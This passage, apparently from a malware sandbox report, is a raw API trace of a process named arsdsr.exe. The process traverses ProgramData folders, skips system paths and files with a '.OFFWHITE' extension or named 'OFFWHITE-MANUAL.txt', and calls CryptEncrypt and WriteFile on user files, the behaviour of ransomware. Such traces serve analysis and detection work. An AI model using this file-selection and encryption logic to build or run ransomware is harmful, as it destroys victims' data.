pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565b78*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.227] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0147.228] SetLastError (dwErrCode=0x0) [0147.228] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565a70, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0147.228] GetLastError () returned 0x6 [0147.228] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x7e007c, dwReserved1=0x295d670, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 0 [0147.228] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0147.228] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 0 [0147.228] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.228] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0147.228] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.228] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="MSScan", cAlternateFileName="")) returned 1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2=".") returned 1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="..") returned 1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="...") returned 1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="windows") returned -1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="$recycle.bin") returned 1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="rsa") returned -1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="ntuser.dat") returned -1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="programdata") returned -1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="appdata") returned 1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="program files") returned -1 [0147.228] lstrcmpiW (lpString1="MSScan", lpString2="program files (x86)") returned -1 [0147.229] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\" [0147.229] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\", lpString2="MSScan" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0147.229] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\" [0147.229] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\" [0147.229] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*" [0147.229] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.229] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.229] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.229] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.229] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.229] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2=".") returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="..") returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="...") returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="windows") returned -1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="$recycle.bin") returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="rsa") returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="ntuser.dat") returned 1 [0147.229] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="programdata") returned 1 [0147.230] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="appdata") returned 1 [0147.230] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="program files") returned 1 [0147.230] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="program files (x86)") returned 1 [0147.230] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\" [0147.230] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\", lpString2="WelcomeScan.jpg" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" [0147.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.230] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0147.230] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0147.230] GetProcessHeap () returned 0x500000 [0147.230] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b68 [0147.231] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.231] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0147.231] GetProcessHeap () returned 0x500000 [0147.231] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b38 [0147.231] GetProcessHeap () returned 0x500000 [0147.231] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b50 [0147.231] GetProcessHeap () returned 0x500000 [0147.231] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565c80 [0147.231] GetProcessHeap () returned 0x500000 [0147.231] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565d88 [0147.231] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.231] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.231] SystemFunction036 (in: RandomBuffer=0x543b38, RandomBufferLength=0x10 | out: RandomBuffer=0x543b38) returned 1 [0147.231] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.231] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.231] SystemFunction036 (in: RandomBuffer=0x543b50, RandomBufferLength=0x10 | out: RandomBuffer=0x543b50) returned 1 [0147.231] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.232] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.232] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565c80*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x565c80*, pdwDataLen=0x295d610*=0x100) returned 1 [0147.232] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.232] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.232] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565d88*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x565d88*, pdwDataLen=0x295d60c*=0x100) returned 1 [0147.232] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0147.232] SetLastError (dwErrCode=0x0) [0147.232] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565c80, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0147.232] GetLastError () returned 0x6 [0147.232] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0147.232] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.232] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="MSScan", cAlternateFileName="")) returned 0 [0147.233] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0147.233] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2=".") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="..") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="...") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="windows") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="$recycle.bin") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="rsa") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="ntuser.dat") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="programdata") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="appdata") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="program files") returned 1 [0147.233] lstrcmpiW (lpString1="WwanSvc", lpString2="program files (x86)") returned 1 [0147.233] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0147.233] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="WwanSvc" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc") returned="C:/Users\\All Users\\Microsoft\\WwanSvc" [0147.233] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\" [0147.233] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\WwanSvc\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\" [0147.233] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\*.*" [0147.233] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0147.234] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.234] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0147.234] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.234] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.234] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="...") returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="windows") returned -1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="$recycle.bin") returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="rsa") returned -1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="ntuser.dat") returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="programdata") returned -1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="appdata") returned 1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="program files") returned -1 [0147.234] lstrcmpiW (lpString1="Profiles", lpString2="program files (x86)") returned -1 [0147.234] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\WwanSvc\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\" [0147.234] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\", lpString2="Profiles" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0147.234] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\" [0147.234] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\" [0147.234] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*") returned="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*" [0147.234] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.235] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.235] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.235] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.235] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.235] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0147.235] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.235] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Profiles", cAlternateFileName="")) returned 0 [0147.235] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0147.235] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0147.235] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0147.235] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0147.235] lstrcmpiW (lpString1="Microsoft Help", lpString2=".") returned 1 [0147.235] lstrcmpiW (lpString1="Microsoft Help", lpString2="..") returned 1 [0147.235] lstrcmpiW (lpString1="Microsoft Help", lpString2="...") returned 1 [0147.235] lstrcmpiW (lpString1="Microsoft Help", lpString2="windows") returned -1 [0147.235] lstrcmpiW (lpString1="Microsoft Help", lpString2="$recycle.bin") returned 1 [0147.235] lstrcmpiW (lpString1="Microsoft Help", lpString2="rsa") returned -1 [0147.236] lstrcmpiW (lpString1="Microsoft Help", lpString2="ntuser.dat") returned -1 [0147.236] lstrcmpiW (lpString1="Microsoft Help", lpString2="programdata") returned -1 [0147.236] lstrcmpiW (lpString1="Microsoft Help", lpString2="appdata") returned 1 [0147.236] lstrcmpiW (lpString1="Microsoft Help", lpString2="program files") returned -1 [0147.236] lstrcmpiW (lpString1="Microsoft Help", lpString2="program files (x86)") returned -1 [0147.236] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0147.236] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Microsoft Help" | out: lpString1="C:/Users\\All Users\\Microsoft Help") returned="C:/Users\\All Users\\Microsoft Help" [0147.236] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.236] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.236] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\*.*") returned="C:/Users\\All Users\\Microsoft Help\\*.*" [0147.236] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft Help\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0147.240] lstrcmpiW 